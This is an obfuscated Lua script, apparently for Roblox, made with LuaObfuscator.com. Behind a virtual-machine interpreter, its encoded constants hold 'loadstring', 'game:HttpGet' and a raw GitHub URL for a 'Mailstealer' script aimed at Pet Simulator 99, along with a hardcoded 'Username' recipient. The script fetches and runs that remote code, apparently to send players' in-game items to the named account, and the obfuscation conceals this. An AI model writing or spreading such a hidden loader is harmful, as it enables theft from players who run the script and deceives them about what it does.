--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0;local v32;while true do if (v31==(2 -1)) then return v32;end if (v31==0) then v32=v1(v16,v19,v19);v19=v19 + (2 -1) ;v31=1 -0 ;end end end v23=nil;function v23()local v33,v34=v1(v16,v19,v19 + 2 );v19=v19 + (933 -(857 + 74)) ;return (v34 * (824 -(367 + 201))) + v33 ;end v18=3;end if (v18==4) then function v25()local v35=v24();local v36=v24();local v37=928 -(214 + 713) ;local v38=(v21(v36,1 + 0 ,4 + 16 ) * ((879 -(282 + 595))^32)) + v35 ;local v39=v21(v36,1658 -(1523 + 114) ,28 + 3 );local v40=((v21(v36,32)==(1 -0)) and  -((1246 -(67 + 113)) -(68 + 997))) or 1 ;if (v39==(1270 -(226 + 1044))) then if (v38==(0 -0)) then return v40 * (117 -(32 + 85)) ;else local v78=0;while true do if ((0 + 0)==v78) then v39=1 + 0 ;v37=0 + (0 -0) ;break;end end end elseif (v39==2047) then return ((v38==(957 -(892 + 48 + 17))) and (v40 * ((2 -1)/((0 -0) -0)))) or (v40 * NaN) ;end return v8(v40,v39-1023 ) * (v37 + (v38/((3 -1)^(402 -(87 + 263))))) ;end v26=nil;function v26(v41)local v42;if  not v41 then v41=v24();if (v41==(952 -(802 + 150))) then return "";end end v42=v3(v16,v19,(v19 + v41) -(2 -1) );v19=v19 + v41 ;local v43={};for v67=1, #v42 do v43[v67]=v2(v1(v3(v42,v67,v67)));end return v6(v43);end v18=5;end if (v18==6) then v29=nil;function v29()local v44=1145 -(466 + 679) ;local v45;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v44==(144 -(72 + 70))) then local v73=0 -0 ;while true do if ((1262 -(1091 + 171))==v73) then v49=nil;v50=nil;v73=1 + 0 ;end if (v73~=1) then else v44=9 -6 ;break;end end end if (0~=v44) then else local v74=0 -0 ;while true do if (v74~=0) then else v45=374 -(123 + 251) ;v46=nil;v74=4 -3 ;end if (1~=v74) then else v44=699 -(208 + 490) ;break;end end end if (v44~=(1 + 0)) then else v47=nil;v48=nil;v44=1 + 1 ;end if (v44~=(839 -(660 + 176))) then else v51=nil;while true do local v79=0;local v80;while true do if (v79==(0 + 0)) then v80=202 -(14 + 188) ;while true do if (v80==(675 -(534 + 141))) then if (v45==(1 + 1)) then local v103=0 + 0 ;while true do if (v103==(0 + 0)) then for v149=1,v50 do local v150=0 -0 ;local v151;local v152;local v153;local v154;while true do if ((1 -0)==v150) then v153=nil;v154=nil;v150=105 -(17 + 86) ;end if (v150~=(2 + 0)) then else while true do if (v151~=1) then else v154=nil;while true do if (1~=v152) then else if (v153==1) then v154=v22()~=0 ;elseif (v153==(5 -3)) then v154=v25();elseif (v153==3) then v154=v26();end v51[v149]=v154;break;end if (v152~=(0 + 0)) then else local v191=0;local v192;while true do if (v191==(166 -(122 + 44))) then v192=0 + 0 ;while true do if (v192~=0) then else v153=v22();v154=nil;v192=397 -(115 + 281) ;end if (v192==(2 -1)) then v152=1 + 0 ;break;end end break;end end end end break;end if (v151~=(0 + 0)) then else local v181=0 -0 ;while true do if (0~=v181) then else v152=0 -0 ;v153=nil;v181=1 -0 ;end if (v181~=(868 -(550 + 317))) then else v151=1 -0 ;break;end end end end break;end if (v150~=(1257 -(1043 + 214))) then else v151=0 -0 ;v152=nil;v150=1213 -(323 + 889) ;end end end v49[7 -4 ]=v22();v103=581 -(361 + 219) ;end if (v103~=(2 -1)) then else for v155=286 -(134 + 151) ,v24() do local v156=320 -(53 + 267) ;local v157;local v158;while true do if (v156~=1) then else while true do if (0~=v157) then else v158=v22();if (v21(v158,1,1666 -(970 + 695) )~=(0 -0)) then else local v184=1990 -(582 + 1408) ;local v185;local v186;local v187;local v188;local v189;while true do if (v184~=(982 -(18 + 964))) then else v185=0;v186=nil;v184=3 -2 ;end if ((3 -2)~=v184) then else v187=nil;v188=nil;v184=2 + 0 ;end if (v184==2) then v189=nil;while true do if (v185==(0 -0)) then local v193=0 -0 ;while true do if (v193==(1825 -(1195 + 629))) then v185=1 + 0 ;break;end if (v193~=(0 -0)) then else v186=241 -(187 + 54) ;v187=nil;v193=781 -(162 + 618) ;end end end if (v185~=2) then else while true do if (v186~=(2 + 0)) then else local v195=0;local v196;while true do if ((0 + 0)==v195) then v196=0 -0 ;while true do if (v196~=0) then else if (v21(v188,1 + 0 ,1 -0 )~=(1 -0)) then else v189[1 + 1 ]=v51[v189[1638 -(1373 + 263) ]];end if (v21(v188,1002 -(451 + 549) ,1 + 1 )==1) then v189[4 -1 ]=v51[v189[1554 -(1126 + 425) ]];end v196=1;end if (v196==(1 -0)) then v186=3;break;end end break;end end end if (v186==(1387 -(746 + 638))) then if (v21(v188,408 -(118 + 287) ,3)~=(3 -2)) then else v189[2 + 2 ]=v51[v189[5 -1 ]];end v46[v155]=v189;break;end if (v186==(341 -(218 + 123))) then local v198=1581 -(1535 + 46) ;local v199;while true do if (v198==(377 -(142 + 235))) then v199=0 + 0 ;while true do if (v199~=1) then else v186=1 + 0 ;break;end if (v199~=(0 -0)) then else v187=v21(v158,562 -(306 + 254) ,1 + 2 );v188=v21(v158,1 + 3 ,6);v199=1;end end break;end end end if (v186==(1 -0)) then local v200=0;while true do if (v200~=(1468 -(899 + 568))) then else v186=2 + 0 ;break;end if ((0 + 0)~=v200) then else local v203=0;while true do if ((0 -0)==v203) then v189={v23(),v23(),nil,nil};if (v187==0) then local v208=290 -(60 + 230) ;local v209;local v210;while true do if (v208~=0) then else v209=0 + 0 ;v210=nil;v208=1;end if (v208==1) then while true do if (v209~=(0 -0)) then else v210=0 -0 ;while true do if (v210~=(572 -(426 + 146))) then else v189[1 + 2 ]=v23();v189[1 + 3 ]=v23();break;end end break;end end break;end end elseif (v187==(1457 -(282 + 1174))) then v189[2 + 1 ]=v24();elseif (v187==2) then v189[1332 -(797 + 532) ]=v24() -((2 + 0)^16) ;elseif (v187~=(814 -(569 + 242))) then else local v213=0 -0 ;local v214;while true do if (v213~=(0 + 0)) then else v214=1024 -(706 + 318) ;while true do if (v214~=(1202 -(373 + 829))) then else v189[3]=v24() -((733 -(476 + 255))^16) ;v189[4]=v23();break;end end break;end end end v203=1252 -(721 + 530) ;end if ((1272 -(945 + 326))~=v203) then else v200=2 -1 ;break;end end end end end end break;end if (v185==(1 + 0)) then local v194=700 -(271 + 429) ;while true do if (v194==1) then v185=1 + 1 ;break;end if (0~=v194) then else v188=nil;v189=nil;v194=1 + 0 ;end end end end break;end end end break;end end break;end if (v156~=(1500 -(1408 + 92))) then else local v178=216 -(42 + 174) ;while true do if (v178==(1087 -(461 + 625))) then v156=1289 -(993 + 295) ;break;end if ((0 + 0)~=v178) then else v157=1171 -(418 + 753) ;v158=nil;v178=1 + 0 ;end end end end end v45=3 + 0 ;break;end end end if (v45==1) then local v104=0;local v105;while true do if (v104==(0 + 0)) then v105=1504 -(363 + 1141) ;while true do if (v105==0) then local v169=0 + 0 ;while true do if (v169~=(1580 -(1183 + 397))) then else v49={v46,v47,nil,v48};v50=v24();v169=530 -(406 + 123) ;end if (v169==1) then v105=1770 -(1749 + 20) ;break;end end end if (v105==1) then v51={};v45=1 + 1 ;break;end end break;end end end v80=1323 -(1249 + 73) ;end if (v80~=1) then else if (v45~=(2 + 1)) then else for v106=2 -1 ,v24() do v47[v106-1 ]=v29();end return v49;end if (v45~=(1933 -(565 + 1368))) then else v46={};v47={};v48={};v45=3 -2 ;end break;end end break;end end end break;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v52)if (v1(v52,2)==79) then local v69=0;while true do if (v69==0) then v20=v0(v3(v52,1,1));return "";end end else local v70=v2(v0(v52,16));if v20 then local v81=v5(v70,v20);v20=nil;return v81;else return v70;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v53,v54,v55,v56=v1(v16,v19,v19 + ((2870 -1206) -((4451 -2974) + 184)) );v19=v19 + 4 ;return (v56 * (22860349 -6083133)) + (v55 * (61064 + 4472)) + (v54 * (1112 -(564 + 292))) + v53 ;end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59)local v60=0;local v61;local v62;local v63;while true do if (v60==0) then v61=v57[1];v62=v57[2];v60=1;end if (v60==1) then v63=v57[3];return function(...)local v82=v61;local v83=v62;local v84=v63;local v85=v28;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do v94=v82[v86];v95=v94[1];if (v95<=11) then if (v95<=5) then if (v95<=2) then if (v95<=0) then v86=v94[3];elseif (v95>1) then v92[v94[2]]();else local v117=v94[2];local v118=v92[v94[3]];v92[v117 + 1 ]=v118;v92[v117]=v118[v94[4]];end elseif (v95<=3) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end elseif (v95>4) then local v123=0;local v124;local v125;while true do if (v123==1) then v92[v124 + 1 ]=v125;v92[v124]=v125[v94[4]];break;end if (0==v123) then v124=v94[2];v125=v92[v94[3]];v123=1;end end elseif ((v94[3]=="_ENV") or (v94[3]=="getfenv")) then v92[v94[2]]=v59;else v92[v94[2]]=v59[v94[3]];end elseif (v95<=8) then if (v95<=6) then for v114=v94[2],v94[3] do v92[v114]=nil;end elseif (v95>7) then v92[v94[2]]=v94[3];else local v128=0;local v129;local v130;local v131;local v132;while true do if (v128==1) then v87=(v131 + v129) -1 ;v132=0;v128=2;end if (v128==0) then v129=v94[2];v130,v131=v85(v92[v129](v13(v92,v129 + 1 ,v94[3])));v128=1;end if (v128==2) then for v179=v129,v87 do local v180=0;while true do if (v180==0) then v132=v132 + 1 ;v92[v179]=v130[v132];break;end end end break;end end end elseif (v95<=9) then if ((v94[3]=="_ENV") or (v94[3]=="getfenv")) then v92[v94[2]]=v59;else v92[v94[2]]=v59[v94[3]];end elseif (v95==10) then v92[v94[2]]=v94[3]~=0 ;else v92[v94[2]]=v94[3];end elseif (v95<=17) then if (v95<=14) then if (v95<=12) then v59[v94[3]]=v92[v94[2]];elseif (v95>13) then v92[v94[2]]=v94[3]~=0 ;else local v140=0;local v141;while true do if (v140==0) then v141=v94[2];v92[v141]=v92[v141](v13(v92,v141 + 1 ,v87));break;end end end elseif (v95<=15) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end elseif (v95==16) then v92[v94[2]]();else local v143=v94[2];local v144,v145=v85(v92[v143](v13(v92,v143 + 1 ,v94[3])));v87=(v145 + v143) -1 ;local v146=0;for v159=v143,v87 do v146=v146 + 1 ;v92[v159]=v144[v146];end end elseif (v95<=20) then if (v95<=18) then local v111=0;local v112;while true do if (v111==0) then v112=v94[2];v92[v112]=v92[v112](v13(v92,v112 + 1 ,v87));break;end end elseif (v95==19) then do return;end else for v164=v94[2],v94[3] do v92[v164]=nil;end end elseif (v95<=21) then v86=v94[3];elseif (v95==22) then do return;end else v59[v94[3]]=v92[v94[2]];end v86=v86 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66)if v66 then local v71=(v64/(2^(v65-1)))%((306 -(244 + 60))^(((v66-(1 + 0 + 0)) -(v65-(477 -(41 + (1573 -(782 + 356)))))) + ((1269 -(176 + 91)) -(938 + (164 -101))))) ;return v71-(v71%((1 -0) + 0)) ;else local v72=(1127 -(936 + 189))^(v65-1) ;return (((v64%(v72 + v72))>=v72) and (1 + 0)) or (1613 -(1565 + 48)) ;end end v22=nil;v18=2;end end end v15("LOL!093O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F50657453696D756C61746F722O392F6D61696E2F4D61696C737465616C657203083O00557365726E616D65030F3O006D696E6563726166745F6E656B6974030A3O004C6F61645363722O656E00223O00120B3O00014O0014000100013O0026033O0002000100010004153O0002000100120B000100013O0026030001000F000100020004153O000F0001001204000200033O001204000300043O00200500030003000500120B000500064O0007000300054O001200023O00022O00020002000100010004153O0021000100260300010005000100010004153O0005000100120B000200013O00260300020016000100020004153O0016000100120B000100023O0004153O0005000100260300020012000100010004153O0012000100120B000300083O00120C000300074O000E000300013O00120C000300093O00120B000200023O0004153O001200010004153O000500010004153O002100010004153O000200012O00133O00017O00",v9(),...);
